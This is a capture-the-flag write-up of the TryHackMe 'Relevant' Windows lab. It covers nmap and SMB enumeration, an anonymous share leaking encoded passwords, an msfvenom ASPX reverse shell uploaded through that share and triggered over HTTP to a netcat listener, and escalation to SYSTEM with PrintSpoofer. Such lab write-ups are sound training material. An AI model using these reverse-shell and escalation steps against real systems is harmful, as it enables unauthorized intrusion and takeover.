#tryhackme #windows #medium ![[Pasted image 20250710233019.png]] --- # Information Gathering - Nmap TCP scan against all ports reveals 8 open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:51 CDT Nmap scan report for 10.10.124.72 Host is up (0.12s latency). Not shown: 65527 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 49663/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds ``` TCP scan against open ports found with `-sCV` options to get more detailed information ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV $IP -p 80,135,139,445,3389,49663,49666,49667 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:54 CDT Nmap scan report for 10.10.124.72 Host is up (0.13s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=Relevant | Not valid before: 2025-07-10T01:49:40 |_Not valid after: 2026-01-09T01:49:40 | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2025-07-11T01:55:28+00:00 |_ssl-date: 2025-07-11T01:56:07+00:00; -1s from scanner time. 49663/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2025-07-10T18:55:31-07:00 | smb2-time: | date: 2025-07-11T01:55:29 |_ start_date: 2025-07-11T01:49:40 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.10 seconds ``` UDP scan against top 10 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:57 CDT Nmap scan report for 10.10.124.72 Host is up (0.12s latency). PORT STATE SERVICE 53/udp open|filtered domain 67/udp open|filtered dhcps 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds ``` --- # Footprinting ##### Port 445 - SMB I tried listing shares with `smbclient` against the IP address and it acutally revealed 4 available shares. The share `nt4wrksv` stood out to me because the rest of the shares are default ones. ```bash root@ip-10-10-151-101:~# smbclient -N -L $IP Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC nt4wrksv Disk SMB1 disabled -- no workgroup available ``` The share `nt4wrksv` allowed `null authentication` meaning we are authenticated to the share without passwords. In the share, there was only one file named `passwords.txt` ```bash root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jul 25 22:46:04 2020 .. D 0 Sat Jul 25 22:46:04 2020 passwords.txt A 98 Sat Jul 25 16:15:33 2020 7735807 blocks of size 4096. 4950767 blocks available smb: \> ``` Inside the file, the first line read `User Passwords - Encoded` and the other two lines appeared to be Base64-encoded. After decoding them, I found two sets of credentials. I tried to connect to RDP with the found credentials but failed. ![[Pasted image 20250710213753.png]] `Nmap` script reveals the SMB service on port 445 has a known vulnerability `CVE-2017-0143` ```bash root@ip-10-10-151-101:~# nmap --script vuln $IP -p 139,445 Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-11 04:24 BST Nmap scan report for ip-10-10-218-16.eu-west-1.compute.internal (10.10.218.16) Host is up (0.00012s latency). PORT STATE SERVICE 139/tcp open netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) MAC Address: 02:44:41:DC:80:7B (Unknown) Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds ``` ##### Port 80 The landing page of the service on Port 80 is just a Microsoft IIS default page. ![[Pasted image 20250710213908.png]] `gobuster` found several directories but all of them were inaccessible. ```bash root@ip-10-10-151-101:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.218.16 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /*checkout* (Status: 400) [Size: 3420] /*docroot* (Status: 400) [Size: 3420] /* (Status: 400) [Size: 3420] /http%3A%2F%2Fwww (Status: 400) [Size: 3420] /q%26a (Status: 400) [Size: 3420] /http%3A (Status: 400) [Size: 3420] /**http%3a (Status: 400) [Size: 3420] /*http%3A (Status: 400) [Size: 3420] /**http%3A (Status: 400) [Size: 3420] /http%3A%2F%2Fyoutube (Status: 400) [Size: 3420] /http%3A%2F%2Fblogs (Status: 400) [Size: 3420] /http%3A%2F%2Fblog (Status: 400) [Size: 3420] /**http%3A%2F%2Fwww (Status: 400) [Size: 3420] Progress: 87664 / 87665 (100.00%) =============================================================== Finished =============================================================== ``` # Exploit - Initial Access ##### Port 49663 `Gobuster` revealed the same directories as on port 80. I looked everywhere but couldn't find any leads to move forward from here. Then I thought to navigate to the share we found in the SMB server and it actually worked! It turns out all of `nt4wrksv` contents are directly accessible through HTTP on port 49663. ![[Pasted image 20250710223955.png]] I'm going to upload a reverse shell payload to the SMB share `nt4wrksv` and take advantage of the fact that it's accessible via a web browser to trigger the shell. I'm using `msfvenom` to create the reverse shell payload, and the payload type will be `.aspx` since the web server is running `IIS` which supports`.aspx` files by default. ```bash root@ip-10-10-151-101:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.151.101 LPORT=1234 -f aspx -o revshell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of aspx file: 3414 bytes Saved as: revshell.aspx ``` ```bash root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> put revshell.aspx putting file revshell.aspx as \revshell.aspx (1666.9 kb/s) (average 1667.0 kb/s) smb: \> ls . D 0 Fri Jul 11 04:53:47 2025 .. D 0 Fri Jul 11 04:53:47 2025 passwords.txt A 98 Sat Jul 25 16:15:33 2020 revshell.aspx A 3414 Fri Jul 11 04:53:47 2025 7735807 blocks of size 4096. 5138963 blocks available smb: \> ``` ![[Pasted image 20250710225453.png]] ```powershell root@ip-10-10-151-101:~# nc -lvnp 1234 Listening on 0.0.0.0 1234 Connection received on 10.10.218.16 49898 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\defaultapppool c:\windows\system32\inetsrv> ``` In `C:\Users\Bob\Desktop`, I found `user.txt` ![[Pasted image 20250710225601.png]] # Privilege Escalation I was doing some enumeration to look for any clues for privilege escalation. Then `whoami /priv` command revealed that the user `Bob` has `SeImpersonatePrivilege` enabled. ![[Pasted image 20250710231321.png]] We are going to use `PrintSpoofer64.exe` binary to exploit this vulnerability. In order to do so, we need to first download the binary in our Kali and transfer the file over to the remote Windows system. `wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe` ![[Pasted image 20250710232252.png]] ![[Pasted image 20250710232641.png]] `PrintSpoofer64.exe -i -c powershell` command instantly creates an interactive powershell session as `SYSTEM`. ![[Pasted image 20250710232746.png]] Found `root.txt` ![[Pasted image 20250710232946.png]]